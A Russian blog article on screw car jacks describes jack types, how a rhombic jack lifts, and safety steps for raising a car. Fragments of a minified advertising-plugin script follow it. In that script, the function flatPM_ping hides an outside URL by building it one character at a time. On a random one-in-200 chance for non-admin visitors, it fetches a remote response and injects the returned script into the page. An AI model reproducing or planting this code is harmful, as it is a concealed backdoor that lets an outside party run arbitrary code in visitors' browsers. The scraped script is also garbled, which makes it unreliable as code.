Комбинированный домкрат. Включает в себя конструктивные особенности рычажно-винтового и ромбического домкратов.

хорошая устойчивость, прочность конструкции

сложность исполнения, высокая стоимость, смещение опорных точек
в процессе работы

Стоечный винтовой домкрат. Простой вариант. Использовался для отечественных автомобилей. Для его применения на кузове автомобиля должно быть предусмотрено специальное посадочное место под штифт.

дешевизна, простота конструкции, устойчивость

ограниченность применения,
слабая ремонтопригодность

Винтовой домкрат бутылочного типа. В основном применяется как дополнительная опора, но может выполнять и функцию обычного автомобильного домкрата.

устойчивость, надежность, большие поднимаемые веса

ограниченность применения, практически неремонтируемый вариант

Простота механизма в совокупности с правильной эксплуатацией делает любой винтовой домкрат практически вечным приспособлением.

Как работает винтовой домкрат

Принцип работы винтового домкрата для легкового автомобиля заключается в перемещении рамной конструкции в заданном направлении под действием смещения гайки винтовой передачи.

Например, в ромбическом домкрате винт с одной стороны закреплен во втулке с возможностью вращения. С противоположной стороны находится гайка, которая жестко закреплена в точке соединения стоек. При вращении винт перемещает гайку и изменяет расстояние между противоположными точками ромбической конструкции. Если горизонтальные противоположные точки приближаются, то вертикальные отдаляются, что и является рабочим движением на подъем.

Другие домкраты работают по примерно таким же алгоритмам с той лишь разницей, что направление рабочих движений в кинематических схемах и рычажные системы отличаются.

Исключением является домкрат бутылочного типа. Он не использует в своей конструкции систему рычагов: здесь работает телескопический принцип винтовой передачи. Но ограниченность диапазона рабочих высот делает этот домкрат малопригодным для обычного легкового автомобиля.

Как правильно пользоваться винтовым домкратом

Работа с использованием автомобильного домкрата сопряжена с определенными рисками. Вывешенный автомобиль находится в неустойчивом состоянии и падение с домкрата может быть чревато травмами или повреждением машины. Поэтому необходимо соблюдать определенные правила при использовании домкрата.

В первую очередь, перед поднятием какой-либо части автомобиля, желательно выбрать для этого подходящую площадку. Устанавливать автомобиль на наклонной плоскости, в грязи или на песке опасно. Во-первых , сам домкрат может находиться в неустойчивом положении. Во-вторых , автомобиль, который остался на трех опорах, может в любой момент потерять свою устойчивость.

Второе — это правильный выбор точки контакта домкрата с кузовом. Большинство современных автомобилей имеет специальные усиленные места для установки домкрата. Иногда эти места закрываются пластиковыми заглушками, тогда ошибиться сложно. В других случаях они располагаются на расстоянии 5–10 см от колесной арки и имеют утолщенное ребро жесткости. Устанавливать домкрат нужно на максимально близком расстоянии к колесу. Так снизится нагрузка, которая будет воздействовать на домкрат.

Перед началом подъема необходимо убедиться, что домкрат установлен строго вертикально. Изначальная установка с перекосом усугубится в процессе подъема, и машина может съехать с домкрата.

Перед подъемом автомобиль нужно застопорить всеми возможными средствами. Если вывешивается переднее колесо, следует затянуть стояночный тормоз. Если заднее — подложить противооткатные упоры под передние колеса. В зависимости от типа привода можно включить первую или заднюю передачу.

Сначала автомобиль приподнимается не небольшую высоту, желательно даже без полного отрыва поднимаемого колеса от поверхности дорожного покрытия. Проверяется устойчивость путем раскачки автомобиля.

Если автомобиль находится в устойчивом положении, то выполняется медленный подъем. В процессе необходимо контролировать положение домкрата. Если начинается перекос, не нужно рисковать! Лучше потратить лишних пару минут и «переподнять» автомобиль заново.

После подъема автомобиля и перед началом работ нужно подставить под кузов козелок или телескопическую подставку. Нельзя подкладывать колеса, кирпич и другие подручные средства. Известно много случаев, когда такие импровизированные подставки подводили в самый неподходящий момент, и человек получал травмы (порой — несовместимые с жизнью).

После подъема на требуемую высоту домкрат необходимо немного опустить, чтобы порог автомобиля лег с минимальным давлением на подставку. Это даст дополнительную точку опоры и повысит устойчивость.

И главное: никогда не теряйте бдительности!

В нашем блоге вы также можете ознакомиться со статьёй о линейке масел «ЛУКОЙЛ».

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика